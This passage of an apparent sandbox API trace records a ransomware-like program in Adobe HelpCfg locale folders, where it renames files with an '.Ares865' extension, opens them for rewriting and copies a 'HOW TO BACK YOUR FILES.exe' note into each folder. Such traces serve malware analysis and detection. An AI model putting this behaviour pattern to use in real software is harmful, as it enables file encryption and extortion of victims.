lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.275] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.276] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.276] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.276] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.276] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.276] lstrlenW (lpString="Ares865") returned 7 [0152.276] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.276] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pt_BR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pt_br\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.278] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4f08 [0152.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.282] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" [0152.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4e90 | out: hHeap=0x2b0000) returned 1 [0152.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0152.282] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned 55 [0152.282] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL" [0152.282] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.282] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.283] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.283] GetLastError () returned 0x0 [0152.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.283] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.283] CloseHandle (hObject=0x120) returned 1 [0152.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.284] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.284] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.284] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.284] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.284] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.284] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.284] lstrlenW (lpString="Ares865") returned 7 [0152.284] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.284] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.284] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.286] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4e90 [0152.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.292] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" [0152.292] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4e18 | out: hHeap=0x2b0000) returned 1 [0152.292] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0152.292] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned 55 [0152.292] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL" [0152.292] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.292] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.293] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.294] GetLastError () returned 0x0 [0152.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.294] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.294] CloseHandle (hObject=0x120) returned 1 [0152.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.294] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.294] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539a8560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539a8560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.294] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.294] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.294] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.294] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.294] lstrlenW (lpString="Ares865") returned 7 [0152.294] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.295] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.297] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4e18 [0152.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.301] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" [0152.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4da0 | out: hHeap=0x2b0000) returned 1 [0152.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0152.301] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned 55 [0152.301] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO" [0152.301] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.301] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.302] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.302] GetLastError () returned 0x0 [0152.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.302] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.302] CloseHandle (hObject=0x120) returned 1 [0152.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.302] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.302] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.303] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.303] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.303] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.303] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.303] lstrlenW (lpString="Ares865") returned 7 [0152.303] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.303] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.303] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.305] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4da0 [0152.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.308] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" [0152.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4d28 | out: hHeap=0x2b0000) returned 1 [0152.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0152.308] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned 55 [0152.308] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR" [0152.308] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.309] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.309] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.310] GetLastError () returned 0x0 [0152.310] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.310] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.310] CloseHandle (hObject=0x120) returned 1 [0152.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.310] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.310] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.310] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.310] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.310] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.310] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.310] lstrlenW (lpString="Ares865") returned 7 [0152.310] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.311] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.311] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.312] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.312] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.313] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4d28 [0152.313] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.316] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" [0152.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4cb0 | out: hHeap=0x2b0000) returned 1 [0152.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0152.316] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned 55 [0152.316] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP" [0152.316] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.316] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.317] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.317] GetLastError () returned 0x0 [0152.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.317] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.317] CloseHandle (hObject=0x120) returned 1 [0152.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.318] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.318] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x539ce6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x539ce6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.318] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.318] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.318] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: 